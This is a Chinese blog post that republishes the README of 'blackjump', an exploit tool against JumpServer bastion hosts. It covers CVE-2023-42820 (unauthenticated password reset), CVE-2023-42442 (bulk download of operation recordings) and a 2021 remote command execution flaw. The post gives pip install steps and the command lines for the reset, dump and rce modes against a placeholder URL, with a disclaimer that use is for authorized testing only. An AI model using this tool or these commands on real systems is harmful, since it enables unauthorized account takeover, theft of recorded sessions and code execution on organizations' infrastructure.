首页 渗透工具 正文
  • 本文约646字,阅读需3分钟
  • 156
  • 0

JumpServer 堡垒机未授权综合漏洞利用, Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021

blackjump

中文 | English

免责声明: 本工具仅面向合法授权的企业安全建设行为,在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标使用

如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任

JumpServer 堡垒机综合漏洞利用

  • [X] 未授权任意用户密码重置 (CVE-2023-42820)
  • [X] 未授权一键下载所有操作录像 (CVE-2023-42442)
  • [X] 未授权任意命令执行漏洞 (RCE 2021)

安装

python3 -m pip install -r requirements.txt

使用指南

  • CVE-2023-42820: 如果知道目标的用户名和邮箱可以指定 --user--email 参数
python3 blackjump.py reset https://vulerability

img.png

python3 blackjump.py dump https://vulerability

img_1.pnge

  • RCE
python3 blackjump.py rce http(s)://vulerability

img.png

  • 帮助
python3 blackjump.py {reset,dump,rce} -h

参考

  1. https://github.com/Veraxy00/Jumpserver-EXP (RCE 2021 漏洞在其基础上优化部分情况命令执行失败或获取不到资产问题)
温馨提示:本文最后更新于2024年7月17日 20:29,若内容或图片失效,请在下方留言或联系博主。
评论
博主关闭了评论